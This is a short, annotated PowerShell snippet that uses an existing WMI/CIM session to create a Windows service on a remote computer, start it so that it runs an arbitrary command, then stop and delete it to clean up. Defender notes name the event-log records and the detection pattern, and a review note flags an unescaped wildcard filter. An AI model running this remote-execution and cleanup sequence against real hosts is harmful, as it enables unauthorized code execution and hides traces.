# Create $ATTACKER_SERVICE using the WMI session established
# in $SESSION_OBJECT.
#
# Calls the Create method of the Win32_Service class on the computer that
# $SESSION_OBJECT is connected to. The method's return value is not
# checked, so a failed creation is not noticed here.
#
# Defender note: registering a service is recorded on that computer as
# System log event 7045 (Service Control Manager) and, when the
# "Audit Security System Extension" subcategory is enabled, as Security
# log event 4697. Both records carry the service name and the image path,
# which here is the value passed as PathName.
#
Invoke-CimMethod -CimSession $SESSION_OBJECT `
                 -ClassName Win32_Service `
                 -MethodName Create `
                 -Arguments @{
                      Name = "$ATTACKER_SERVICE";
                      DisplayName = "$ATTACKER_SERVICE";
                      PathName = "$SOME_COMMAND";          # command line the Service Control Manager runs on start
                      ServiceType = [byte]::Parse("16");   # 16 (0x10) = own-process Win32 service
                      StartMode = "Manual"                 # not started at boot, only on an explicit start request
                  }
 
# Get a handle to the new service.
#
# Queries Win32_Service over the same CIM session and stores the result in
# $SERVICE_OBJECT, which the later Invoke-CimMethod calls use as their
# -InputObject.
#
# NOTE(review): LIKE is the WQL pattern operator, so '%', '_' and '[' in
# $ATTACKER_SERVICE are treated as wildcards and the query can return more
# than one service; the name is also interpolated into the filter unescaped.
# An exact match would use "Name = '...'" - confirm which is intended, since
# the stop and delete calls below act on whatever this returns.
#
$SERVICE_OBJECT = Get-CimInstance `
                      -CimSession $SESSION_OBJECT `
                      -ClassName Win32_Service `
                      -filter "Name LIKE '$ATTACKER_SERVICE'"
 
# Invoke $ATTACKER_SERVICE.
#
# Calls StartService on the instance held in $SERVICE_OBJECT; the return
# value is not checked.
#
# Defender note: a service started this way is launched by the Service
# Control Manager, so the resulting process is a child of services.exe.
# If the configured PathName is not a real service program (presumably the
# case for an arbitrary command - verify), the start request is reported as
# failed or timed out in the System log (events 7000 / 7009) shortly after
# the 7045 install record.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName StartService
 
# Make sure that $ATTACKER_SERVICE is really dead.
#
# Calls StopService on the instance held in $SERVICE_OBJECT. The return
# value is not checked, so this step does not confirm that the service
# actually stopped.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName StopService
 
# Clean up after yourself.
#
# Calls Delete on the instance held in $SERVICE_OBJECT, which removes the
# service registration; the return value is not checked.
#
# Defender note: deleting the service does not remove the event-log records
# written when it was installed and started. A service that is created,
# started, stopped and deleted within a short interval, with an unusual
# image path, is a pattern worth alerting on; correlate the 7045 / 4697
# records with the remote logon that preceded them.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName Delete